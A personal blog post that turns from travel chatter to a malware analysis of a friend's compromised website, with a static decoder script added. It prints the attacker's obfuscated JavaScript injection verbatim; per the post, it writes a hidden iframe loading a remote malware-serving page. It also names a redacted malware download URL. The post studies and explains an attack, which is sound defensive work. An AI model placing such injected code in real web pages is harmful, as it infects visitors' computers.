My Encounter with Live Web Attack

It was not going to be an average day, I knew from the dawn, as by EOD I would be on my way to Pune. You might think, what's so special about visiting Pune?
Let me tell you, people who have spent at least a year or two in a city like Pune or Bangalore will hate to stay in Hyderabad unless they have grown up there or have some other solid reason. For me it was almost 1.7 years away from my favourite city. This feeling of excitement happens every time I book my ticket to Pune. There are lots of reasons behind it, like meeting old friends, enjoying the super cool weather, adventurous treks and, most important, chicks 😉

Yes, Hyderabad sucks in both quality and quantity as compared to Pune and B'lore.
Anyway, office started at 10 AM and we were all told to change cubicles. Don't ask why; it's a long story and an effect of the global recession. I checked emails, had a coffee and was about to start work. The office boy came to my place and said "Sir, aapka cube move karna hai.." (We are moving your cubicle, sir).
I knew it would take him at least an hour to relocate my small lab. I preferred to supervise and made sure my existing network configuration stayed intact. I wanted a smooth transition, just like the kernel does for a process: the kernel puts a process back into the running state after it has been swapped out for the time being, without letting her know 😉

After a couple of hours, I was all set in my new place. I opened up the terminal and resumed where I had left off yesterday (yes, I stopped carrying office work home), but couldn't concentrate. My head was running through all the plans to execute after landing in Pune.
Suddenly I got a call from one of my good friends from Pune, who works as a web developer for a small firm. I thought he was going to ask about my itinerary and plans for the latest trek, but I was wrong. He sounded very serious and disturbed. He told me that he had been handed over a project (website maintenance) some days ago which was developed by his ex-colleague, and for the past 2-3 days that site had not been behaving properly. Many people reported their systems behaving weird after visiting the site. He had also found some junk code in the sources. This was enough for me to raise an alert. He asked me if I could help, and that is when it all started.

In a matter of minutes I had all the required infected source code in my inbox. I went to the cafeteria and grabbed a coffee before starting my analysis.

Stage I

I saw it was JavaScript injected into his index.php. A function was injected which was getting called every time the page loaded, from the <Body> tag.

// The injected decoder: "i += 4 >> 1" is just "i += 2", so a1() keeps every
// second character of the escaped string and throws away the junk in between.
function a1(s){b='';for(i=0;i<s.length;i+=4>>1)b+=s.charAt(i);return b;}
document.write(a1('\74u\x64n\151k\x76n\40o\x73w\164n\x79 \154o\x65b\75f\x22u\166s\x69c\163a\x69t\142i\x69o\154n\x69u\164n\x79k\72n\x68o\151w\x64n\144 \x65o\156b\x22f\76u\x3cs\151c\x66a\162t\x61i\155o\x65n\40u\x73n\162k\x63n\75o\x22w\150n\x74 \164o\x70b\72f\x2fu\57s\x77c\145a\x74t\55i\x68o\157n\x6cu\145n\x2ek\143n\x6fo\155w\x2fn\142 \x69o\156b\x2ff\151u\x6es\144c\x65a\170t\x2ei\160o\x68n\160u\x22n\40k\x76n\151o\x73w\151n\x62 \151o\x6cb\151f\x74u\171s\x3ac\150a\x69t\144i\x64o\145n\x6eu\40n\x77k\151n\x64o\164w\x68n\75 \x31o\60b\x30f\40u\x68s\145c\x69a\147t\x68i\164o\x3dn\70u\x30n\76k\x3cn\57o\x69w\146n\x72 \141o\x6db\145f\x3eu\74s\x2fc\144a\x69t\166i\x3eo'));

Looking at the document.write() at the end, I recalled the SANS Diary story about decoding JavaScript. A quick use of the lazy method showed me a hidden iframe calling some remote index.php from the function. Pretty easy though. Refer to the screenshot.

[Screenshot: stage1]
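As an added example (not the author's code), here is a static decoder for the injected snippet above: it expands the JavaScript escape sequences and drops the interleaved junk characters exactly as a1() does, but without executing any of the attacker's code, and then reports whether the result is a hidden iframe and where it points. The payload string is the one from the injected index.php with the backslashes of the octal escapes restored; the function names are my own.

```javascript
// Added example (not the post's own code): decode the injected a1()/document.write()
// payload statically, without eval() or a browser, and pull out the indicators.

// Step 1: expand the JS string escapes (\xHH, \NNN octal, \uHHHH, \n ...) exactly
// as the engine would when parsing the literal, so we see the real characters.
function unescapeJsLiteral(src) {
  return src.replace(/\\(x[0-9A-Fa-f]{2}|u[0-9A-Fa-f]{4}|[0-7]{1,3}|[^xu0-7])/g, (m, esc) => {
    if (esc[0] === 'x' || esc[0] === 'u') return String.fromCharCode(parseInt(esc.slice(1), 16));
    if (/^[0-7]/.test(esc)) return String.fromCharCode(parseInt(esc, 8));
    const simple = { n: '\n', r: '\r', t: '\t', b: '\b', f: '\f', v: '\v' };
    return esc in simple ? simple[esc] : esc;   // \' \" \\ -> the character itself
  });
}

// Step 2: a1() keeps s.charAt(i) for i = 0, 2, 4, ... because "i += 4 >> 1" is just
// "i += 2"; every odd position is a throw-away junk character.  Stride and offset are
// parameters so the same helper handles variants that use a different interleave.
function stripInterleavedJunk(s, stride = 2, offset = 0) {
  let out = '';
  for (let i = offset; i < s.length; i += stride) out += s.charAt(i);
  return out;
}

function decodeA1Payload(literalBody) {
  return stripInterleavedJunk(unescapeJsLiteral(literalBody));
}

// Step 3: what a responder wants from the decoded markup: is there an iframe,
// is it hidden, and where does it point.
function summariseInjectedHtml(html) {
  const m = /<iframe[^>]*\bsrc\s*=\s*["']([^"']+)["']/i.exec(html);
  return {
    hasIframe: /<iframe\b/i.test(html),
    hidden: /visibility\s*:\s*hidden/i.test(html),
    src: m ? m[1] : null,
  };
}

// The literal from the injected index.php above, as raw source text (every backslash
// doubled so it stays an escape sequence instead of being expanded here).
const INJECTED_LITERAL =
  '\\74u\\x64n\\151k\\x76n\\40o\\x73w\\164n\\x79 \\154o\\x65b\\75f\\x22u\\166s\\x69c\\163a\\x69t\\142i\\x69o\\154n\\x69u\\164n\\x79k\\72n\\x68o\\151w\\x64n\\144 \\x65o\\156b\\x22f\\76u' +
  '\\x3cs\\151c\\x66a\\162t\\x61i\\155o\\x65n\\40u\\x73n\\162k\\x63n\\75o\\x22w\\150n\\x74 \\164o\\x70b\\72f\\x2fu\\57s\\x77c\\145a\\x74t\\55i\\x68o\\157n\\x6cu\\145n\\x2ek\\143n\\x6fo\\155w\\x2fn\\142 \\x69o\\156b\\x2ff\\151u\\x6es\\144c\\x65a\\170t\\x2ei\\160o\\x68n\\160u\\x22n' +
  '\\40k\\x76n\\151o\\x73w\\151n\\x62 \\151o\\x6cb\\151f\\x74u\\171s\\x3ac\\150a\\x69t\\144i\\x64o\\145n\\x6eu\\40n\\x77k\\151n\\x64o\\164w\\x68n\\75 \\x31o\\60b\\x30f\\40u\\x68s\\145c\\x69a\\147t\\x68i\\164o\\x3dn\\70u\\x30n\\76k' +
  '\\x3cn\\57o\\x69w\\146n\\x72 \\141o\\x6db\\145f\\x3eu\\74s\\x2fc\\144a\\x69t\\166i\\x3eo';

const decoded = decodeA1Payload(INJECTED_LITERAL);
console.log(decoded);
console.log(summariseInjectedHtml(decoded));
```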

I went to my BackTrack VM and wget'ed the target index.php for the second stage of my analysis.

Stage II

Just as I guessed, this PHP page had highly obfuscated JavaScript inside. This time I used the textarea trick to decode. When launched under Firefox, I got another obfuscated JavaScript, this time with calls to eval() and arguments.callee.toString().
The call to arguments.callee.toString() confirmed that I was not supposed to change the function in any way. This function call references itself and thus can detect any modifications.

The function started with eval(function(<obfuscated code inside>))

I am not going to explain the whole de-obfuscation story. To cut it short, I always prefer to google before starting any analysis and try to avoid repetitive analysis. This time when I asked Google whether she knew this mess, she replied with a PandaLabs link. The code looked similar to the one analyzed by PandaLabs. It was easy then.
Just to cut it short, after removing the HTML tags the pure JavaScript code was fed to Rhino. Rhino executed the whole JS and showed the actual URL which was the culprit behind installing the malware on the end users' computers.
antimalxxxxscan.com/xxxx.exe [Anyways site is blocked now]

I was not able to get a sample of the original backdoor as it had been removed from the site. It was for sure that the ISP hosting the site was compromised, and all the hosted domains were reported as harmful by Google. I asked my friend to bring this concern to his ISP's attention and pointed him to Google's safety measures as I left for my dream city.

References:

  1. SANS Diary
  2. JavaScript De-Obfuscation with Rhino
  3. Cleaning and Securing Your Site